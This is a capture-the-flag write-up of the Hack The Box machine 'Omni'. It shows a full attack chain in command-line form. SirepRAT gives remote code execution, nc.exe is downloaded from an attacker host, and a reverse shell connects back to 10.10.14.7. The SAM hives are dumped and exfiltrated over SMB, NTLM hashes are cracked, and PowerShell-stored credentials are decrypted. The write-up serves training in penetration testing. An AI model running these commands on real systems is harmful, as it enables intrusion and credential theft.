Omni
Contents
Ports scan
u505@naos:~/HTB/Machines/Omni$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.204
Starting masscan 1.0.5 at 2021-01-12 12:56:04 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 29819/tcp on 10.10.10.204 Discovered open port 8080/tcp on 10.10.10.204 Discovered open port 135/tcp on 10.10.10.204 Discovered open port 29817/tcp on 10.10.10.204 Discovered open port 29820/tcp on 10.10.10.204 Discovered open port 5985/tcp on 10.10.10.204
Operating system seems to be windows.
u505@naos:~/HTB/Machines/Omni$ sudo nmap -sC -sV -O omni Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 07:58 EST Nmap scan report for omni (10.10.10.204) Host is up (0.037s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 8080/tcp open upnp Microsoft IIS httpd | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=Windows Device Portal |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Site doesn't have a title. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows XP|2008 (87%) OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 Aggressive OS guesses: Microsoft Windows XP SP3 (87%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.14 seconds
u505@naos:~/HTB/Machines/Omni$ cat ports | cut -d ' ' -f 4 | cut -d '/' -f 1 | sort -n | while read port; do printf $port","; done 135,5985,8080,29817,29819,29820,
Port 8080 is not accessible without authorization, and there are 2 strange ports 29819 and 28820.
u505@naos:~/HTB/Machines/Omni$ sudo nmap -sC -sV -O -p 135,5985,8080,29817,29819,29820 omni Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 08:00 EST Nmap scan report for omni (10.10.10.204) Host is up (0.037s latency).
PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 5985/tcp open upnp Microsoft IIS httpd 8080/tcp open upnp Microsoft IIS httpd | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=Windows Device Portal |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Site doesn't have a title. 29817/tcp open unknown 29819/tcp open arcserve ARCserve Discovery 29820/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port29820-TCP:V=7.91%I=7%D=1/12%Time=5FFD9D83%P=x86_64-pc-linux-gnu%r(N SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10," SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0 SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x SF:c9}\xc8O\x12"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows XP|7 (89%) OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 77.37 seconds
Port 8080
No access without user and password.
Enum ports 29817 29819 and 29820
Ports are related to 29817 is WPCon, 29819 WPConTCPPing and WPPingSirep and 29820 WPConProtocol2
u505@naos:~/HTB/Machines/Omni$ telnet omni 29819
Trying 10.10.10.204...
Connected to omni.
Escape character is '^]'.
PING
These ports are related to Windows IoT, and this long presentation details the Sirep protocol and discloses a tool with Remote access the device.
SirepRAT tool
After cloning the git repository of sirepRAT, check help and try to familiarize with the tool.
505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py -h usage: SirepRAT.py target_device_ip command_type [options]
Exploit Windows IoT Core's Sirep service to execute remote commands on the device
positional arguments: target_device_ip The IP address of the target IoT Core device command_type The Sirep command to use. Available commands are listed below
optional arguments: -h, --help show this help message and exit --return_output Set to have the target device return the command output stream --cmd CMD Program path to execute --as_logged_on_user Set to impersonate currently logged on user on the target device --args ARGS Arguments string for the program --base_directory BASE_DIRECTORY The working directory from which to run the desired program --remote_path REMOTE_PATH Path on target device --data DATA Data string to write to file --v Verbose - if printable, print result --vv Very verbose - print socket buffers and more
available commands: * LaunchCommandWithOutput * PutFileOnDevice * GetFileFromDevice * GetFileInformationFromDevice * GetSystemInformationFromDevice
remarks: - Use moustaches to wrap remote environment variables to expand (e.g. Template:Userprofile)
Usage example: python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path C:\Windows\System32\hostname.exe
u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 GetSystemInformationFromDevice
<SystemInformationResult | type: 51, payload length: 32, kv: {'dwOSVersionInfoSize': 0, 'dwMajorVersion': 10, 'dwMinorVersion': 0, 'dwBuildNumber': 17763, 'dwPlatformId': 2, 'szCSDVersion': 0, 'wServicePackMajor': 1, 'wServicePackMinor': 2, 'wSuiteMask': 0, 'wProductType': 0, 'wReserved': 0}>
Upload date to file.
u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 PutFileOnDevice --remote_path 'C:\Windows\Temp\uploadtest.txt' --data 'Hello u505' <HResultResult | type: 1, payload length: 4, HResult: 0x0> <HResultResult | type: 1, payload length: 4, HResult: 0x0>
Download file.
u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 GetFileInformationFromDevice --remote_path 'C:\Windows\Temp\uploadtest.txt'
<FileInformationResult | type: 61, payload length: 40, kv: {'dwFileAttributes': 32, 'file_size': 65536, 'time_created': '2441-01-24 18:48:06.203150', 'time_last_access': '2441-01-24 18:48:06.203150', 'time_last_write': '2441-01-24 18:48:06.203150', 'HResult': '0x0'}>
Access file content created before.
u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 GetFileFromDevice --remote_path 'C:\Windows\Temp\uploadtest.txt' --v ---------
--------- --------- Hello u505 --------- <HResultResult | type: 1, payload length: 4, HResult: 0x0> <FileResult | type: 31, payload length: 13562, payload peek: 'b'H\x00e\x00l\x00l\x00o\x00 \x00u\x005\x000\x005\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>
Upload nc.exe
Start web server and copy nc.exe executable.
u505@naos:~/HTB/Machines/Omni$ mkdir web u505@naos:~/HTB/Machines/Omni$ cd web/ u505@naos:~/HTB/Machines/Omni/web$ cp /opt/utils/nc.exe/nc64.exe ./ u505@naos:~/HTB/Machines/Omni/web$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
Download nc.exe from the target machine.
u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args ' /c powershell Invoke-WebRequest -Uri http://10.10.14.7/nc64.exe -OutFile C:\Windows\Temp\nc.exe' --v ---------
--------- ---------
--------- <HResultResult | type: 1, payload length: 4, HResult: 0x0> <ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00>
Obtain reverse shell
u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Execute nc remotely.
u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c C:\Windows\Temp\nc.exe 10.10.14.7 4444 -e cmd ' --v ---------
--------- <HResultResult | type: 1, payload length: 4, HResult: 0x0>
The reverse shell opens.
u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.204. Ncat: Connection from 10.10.10.204:49670. Microsoft Windows [Version 10.0.17763.107] Copyright (c) Microsoft Corporation. All rights reserved.
C:\windows\system32>whoami whoami 'whoami' is not recognized as an internal or external command, operable program or batch file.
C:\windows\system32>echo %username% echo %username% omni$
The command whoami doesn't exist in Windows IoT. The username variable is omni$. We have a system user.
User and root flags
I found the user and root flags, but the "flag" is encrypted with powershell user credentials. :( To decrypt them, we need to log as the user app (or administrator).
c:\Data\Users\app>type user.txt type user.txt <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props> <S N="UserName">flag</S> <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS> </Props> </Obj> </Objs>
C:\Data\Users\administrator>type root.txt type root.txt <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props> <S N="UserName">flag</S> <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7</SS> </Props> </Obj> </Objs>
Add user
First reflex, change administrator password.
c:\Data\Users\app>net user administrator u505 net user administrator u505 The command completed successfully.
But when I tried to access the web console the access was denied.
We add a new user
c:\Data\Users\app>net user u505 u505 /add net user u505 u505 /add The command completed successfully.
Try to add the new user in administrator group.
c:\Data\Users\app>net localgroup administrators /add u505 & net localgroup administrators net localgroup administrators /add u505 & net localgroup administrators The command completed successfully.
Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain
Members
------------------------------------------------------------------------------- Administrator u505 The command completed successfully.
The user was successfully added, but after a few seconds our user is removed from administrator group.
c:\Data\Users\app>net localgroup administrators net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain
Members
------------------------------------------------------------------------------- Administrator The command completed successfully.
With the user u505, we can access the web console, but as low privileged user.
It seems that a process, reset the administrator password and remove users from administrator group.
Dump SAM
The user system has privileges to dump the SAM.
C:\Windows\Temp>reg save HKLM\sam sam reg save HKLM\sam sam The operation completed successfully.
C:\Windows\Temp>reg save HKLM\security security reg save HKLM\security security The operation completed successfully.
C:\Windows\Temp>reg save HKLM\system system reg save HKLM\system system The operation completed successfully.
Download sam files
To download SAM file, we create a samba share on our machine.
u505@naos:~/HTB/Machines/Omni/web$ sudo python3 /opt/utils/impacket/examples/smbserver.py -username u505 -password u505 netshare ./ -smb2support Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed
Mount the network share in X: letter.
C:\Windows\Temp>net use x: \\10.10.14.7\netshare /USER:u505 u505 net use x: \\10.10.14.7\netshare /USER:u505 u505 The command completed successfully.
Copy Sam files to the network share.
C:\Windows\Temp>copy sam X:\
copy sam X:\
1 file(s) copied.
C:\Windows\Temp>copy security X:\
copy security X:\
1 file(s) copied.
C:\Windows\Temp>copy system X:\
copy system X:\
1 file(s) copied.
Change owner in our box.
505@naos:~/HTB/Machines/Omni/web$ sudo chown u505:u505 sam security system [sudo] password for u505:
Dump hashes
u505@naos:~/HTB/Machines/Omni/web$ python3 /opt/utils/impacket/examples/secretsdump.py -sam sam -security security -system system LOCAL Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65::: sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea::: DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958::: app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95::: u505:1004:aad3b435b51404eeaad3b435b51404ee:a770bbce91ca05c1b7d3b8b13102cd6d::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] DPAPI_SYSTEM dpapi_machinekey:0xdc2beb4869328393b57ea9a28aeff84932c3e3ef dpapi_userkey:0x6760a0b981e854b66007b33962764d5043f3d013 [*] NL$KM 0000 14 07 22 73 99 42 B0 ED F5 11 9A 60 FD A1 10 EF .."s.B.....`.... 0010 DF 19 3C 6C 22 F2 92 0C 34 B1 6D 78 CC A7 0D 14 ..<l"...4.mx.... 0020 02 7B 81 04 1E F6 1C 66 69 75 69 84 A7 31 53 26 .{.....fiui..1S& 0030 A3 6B A9 C9 BF 18 A8 EF 10 36 DB C2 CC 27 73 3D .k.......6...'s= NL$KM:140722739942b0edf5119a60fda110efdf193c6c22f2920c34b16d78cca70d14027b81041ef61c6669756984a7315326a36ba9c9bf18a8ef1036dbc2cc27733d [*] Cleaning up...
Search for the hashcat mode.
u505@naos:~/HTB/Machines/Omni/web$ hashcat --example-hashes | grep -A 2 -B 1 NTLM
MODE: 1000
TYPE: NTLM
HASH: b4b9b02e6f09a9bd760f388b67351e2b
PASS: hashcat
--
MODE: 5500
TYPE: NetNTLMv1 / NetNTLMv1+ESS
HASH: ::5V4T:ada06359242920a500000000000000000000000000000000:0556d5297b5daa70eaffde82ef99293a3f3bb59b7c9704ea:9c23f6c094853920
PASS: hashcat
--
MODE: 5600
TYPE: NetNTLMv2
HASH: 0UL5G37JOI0SX::6VB1IS0KA74:ebe1afa18b7fbfa6:aab8bf8675658dd2a939458a1077ba08:010100000000000031c8aa092510945398b9f7b7dde1a9fb00000000f7876f2b04b700
PASS: hashcat
Create hash file.
u505@naos:~/HTB/Machines/Omni$ cat samhashes Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65::: sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea::: DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958::: app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95::: u505:1004:aad3b435b51404eeaad3b435b51404ee:a770bbce91ca05c1b7d3b8b13102cd6d:::
Try to crack it by dictionary attack.
u505@naos:~/HTB/Machines/Omni$ hashcat -m 1000 samhashes /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashcat (v6.1.1) starting... ...
31d6cfe0d16ae931b73c59d7e0c089c0: e3cb0651718ee9b4faffe19a51faff95:mesh5143 Approaching final keyspace - workload adjusted.
Session..........: hashcat Status...........: Exhausted Hash.Name........: NTLM Hash.Target......: samhashes Time.Started.....: Tue Jan 12 13:46:50 2021 (2 secs) Time.Estimated...: Tue Jan 12 13:46:52 2021 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 7903.4 kH/s (5.72ms) @ Accel:1024 Loops:1 Thr:64 Vec:1 Recovered........: 2/7 (28.57%) Digests Progress.........: 14344384/14344384 (100.00%) Rejected.........: 0/14344384 (0.00%) Restore.Point....: 14344384/14344384 (100.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: $HEX[303334323137383439] -> $HEX[042a0337c2a156616d6f732103] Hardware.Mon.#1..: Temp: 40c Util: 47% Core:1032MHz Mem:2505MHz Bus:16
Started: Tue Jan 12 13:46:48 2021 Stopped: Tue Jan 12 13:46:53 2021
Hashcat finds 2 hashes
u505@naos:~/HTB/Machines/Omni$ hashcat -m 1000 samhashes /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
e3cb0651718ee9b4faffe19a51faff95:mesh5143
Second run of hashcat with 64 best rules.
u505@naos:~/HTB/Machines/Omni$ hashcat -m 1000 samhashes /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r /usr/share/hashcat/rules/best64.rule hashcat (v6.1.1) starting... ... INFO: Removed 2 hashes found in potfile.
Host memory required for this attack: 151 MB
Dictionary cache hit: * Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt * Passwords.: 14344384 * Bytes.....: 139921497 * Keyspace..: 1104517568
a770bbce91ca05c1b7d3b8b13102cd6d:u505 Cracking performance lower than expected? ... Session..........: hashcat Status...........: Exhausted Hash.Name........: NTLM Hash.Target......: samhashes Time.Started.....: Tue Jan 12 13:48:11 2021 (10 secs) Time.Estimated...: Tue Jan 12 13:48:21 2021 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 119.1 MH/s (13.20ms) @ Accel:256 Loops:38 Thr:64 Vec:1 Recovered........: 3/7 (42.86%) Digests Progress.........: 1104517568/1104517568 (100.00%) Rejected.........: 0/1104517568 (0.00%) Restore.Point....: 14344384/14344384 (100.00%) Restore.Sub.#1...: Salt:0 Amplifier:76-77 Iteration:0-38 Candidates.#1....: $HEX[236823682368] -> $HEX[04a156616d6f] Hardware.Mon.#1..: Temp: 47c Util: 84% Core:1202MHz Mem:2505MHz Bus:16
Started: Tue Jan 12 13:48:11 2021 Stopped: Tue Jan 12 13:48:21 2021
It finds my password.
u505@naos:~/HTB/Machines/Omni$ hashcat -m 1000 samhashes /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show 31d6cfe0d16ae931b73c59d7e0c089c0: e3cb0651718ee9b4faffe19a51faff95:mesh5143 a770bbce91ca05c1b7d3b8b13102cd6d:u505
The password found corresponds to user app.
u505@naos:~/HTB/Machines/Omni$ grep e3cb0651718ee9b4faffe19a51faff95 samhashes
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
The password of user app is mesh5143
User flag
u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lnvp 4445 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445
When we try to call nc, the user app has no access to C:\Windows\Temp
Copy of nc to user profile folder.
C:\Windows\Temp>copy nc.exe C:\data\users\app\nc.exe
copy nc.exe C:\data\users\app\nc.exe
1 file(s) copied.
u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lnvp 4445 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445 Ncat: Connection from 10.10.10.204. Ncat: Connection from 10.10.10.204:49695. Microsoft Windows [Version 10.0.17763.107] Copyright (c) Microsoft Corporation. All rights reserved.
C:\windows\system32>cd c:\Data\Users\app cd c:\Data\Users\app
c:\Data\Users\app>dir dir Volume in drive C is MainOS Volume Serial Number is 3C37-C677
Directory of c:\Data\Users\app
01/12/2021 07:08 PM <DIR> . 01/12/2021 07:08 PM <DIR> .. 07/04/2020 06:28 PM <DIR> 3D Objects 07/04/2020 06:28 PM <DIR> Documents 07/04/2020 06:28 PM <DIR> Downloads 07/04/2020 06:28 PM <DIR> Favorites 07/04/2020 07:20 PM 344 hardening.txt 07/04/2020 07:14 PM 1,858 iot-admin.xml 07/04/2020 06:28 PM <DIR> Music 01/12/2021 07:01 PM 45,272 nc.exe 07/04/2020 06:28 PM <DIR> Pictures 07/04/2020 08:53 PM 1,958 user.txt 07/04/2020 06:28 PM <DIR> Videos 4 File(s) 49,432 bytes 9 Dir(s) 4,691,345,408 bytes free
The file hardening.txt doesn't provide much information
c:\Data\Users\app>type hardening.txt type hardening.txt - changed default administrator password of "p@ssw0rd" - added firewall rules to restrict unnecessary services - removed administrator account from "Ssh Users" group
We decrypt the powershell credentials inside the file user.txt
c:\Data\Users\app>powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Attempting to perform the InitializeDefaultDrives operation on the 'FileSystem' provider failed.
PS C:\Data\Users\app>cat user.txt cat user.txt <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props>flag<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS> </Props> </Obj> </Objs>
PS C:\Data\Users\app>$credential = Import-CliXml -Path user.txt
$credential = Import-CliXml -Path user.txt
PS C:\Data\Users\app>$credential.GetNetworkCredential().Username
$credential.GetNetworkCredential().Username
flag
PS C:\Data\Users\app> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
<USER_FLAG>
The file iot-admin.txt contains administrator credentials encrypted with app user.
PS C:\Data\Users\app> cat iot-admin.xml cat iot-admin.xml <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props> <S N="UserName">omni\administrator</S> <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa28853640000000002000000000010660000000100002000000000855856bea37267a6f9b37f9ebad14e910d62feb252fdc98a48634d18ae4ebe000000000e80000000020000200000000648cd59a0cc43932e3382b5197a1928ce91e87321c0d3d785232371222f554830000000b6205d1abb57026bc339694e42094fd7ad366fe93cbdf1c8c8e72949f56d7e84e40b92e90df02d635088d789ae52c0d640000000403cfe531963fc59aa5e15115091f6daf994d1afb3c2643c945f2f4b8f15859703650f2747a60cf9e70b56b91cebfab773d0ca89a57553ea1040af3ea3085c27</SS> </Props> </Obj> </Objs>
Decrypt the credentials stored in the xml file.
PS C:\Data\Users\app>$credential = Import-CliXml -Path iot-admin.xml
$credential = Import-CliXml -Path iot-admin.xml
PS C:\Data\Users\app>$credential.GetNetworkCredential().Username
$credential.GetNetworkCredential().Username
administrator
PS C:\Data\Users\app>$credential.GetNetworkCredential().Password
_1nt3rn37ofTh1nGz
Administrator user
We raise a new listener for user administrator
u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lvnp 4446 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446
Log as administrator
Run command to launch a new reverse shell as administrator
u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lvnp 4446 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446 Ncat: Connection from 10.10.10.204. Ncat: Connection from 10.10.10.204:49678. Microsoft Windows [Version 10.0.17763.107] Copyright (c) Microsoft Corporation. All rights reserved.
C:\windows\system32>cd c:\Data\Users\administrator cd c:\Data\Users\administrator
c:\Data\Users\administrator>dir dir Volume in drive C is MainOS Volume Serial Number is 3C37-C677
Directory of c:\Data\Users\administrator
07/04/2020 08:48 PM <DIR> . 07/04/2020 08:48 PM <DIR> .. 07/03/2020 10:23 PM <DIR> 3D Objects 07/03/2020 10:23 PM <DIR> Documents 07/03/2020 10:23 PM <DIR> Downloads 07/03/2020 10:23 PM <DIR> Favorites 07/03/2020 10:23 PM <DIR> Music 07/03/2020 10:23 PM <DIR> Pictures 07/04/2020 08:48 PM 1,958 root.txt 07/03/2020 10:23 PM <DIR> Videos 1 File(s) 1,958 bytes 9 Dir(s) 4,691,312,640 bytes free
As previously the flag is powershell encrypted.
c:\Data\Users\administrator>type root.txt type root.txt <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props> <S N="UserName">flag</S> <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7</SS> </Props> </Obj> </Objs>
c:\Data\Users\administrator>powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Attempting to perform the InitializeDefaultDrives operation on the 'FileSystem' provider failed. PS C:\Data\Users\administrator> $credential = Import-CliXml -Path root.txt $credential = Import-CliXml -Path root.txt PS C:\Data\Users\administrator> $credential.GetNetworkCredential().Username $credential.GetNetworkCredential().Username flag PS C:\Data\Users\administrator>$credential.GetNetworkCredential().Password $credential.GetNetworkCredential().Password <ROOT_FLAG>
References
- https://social.msdn.microsoft.com/Forums/en-US/75314423-de13-4eff-bd15-0fec8b9c1da4/ports-open?forum=WindowsIoT
- SirepRAT Abusing a Windows service for RCE
- Dumping Windows Credentials
- How To Save and Read Sensitive Data with PowerShell
Daniel Simao 15:04, 12 January 2021 (EST)
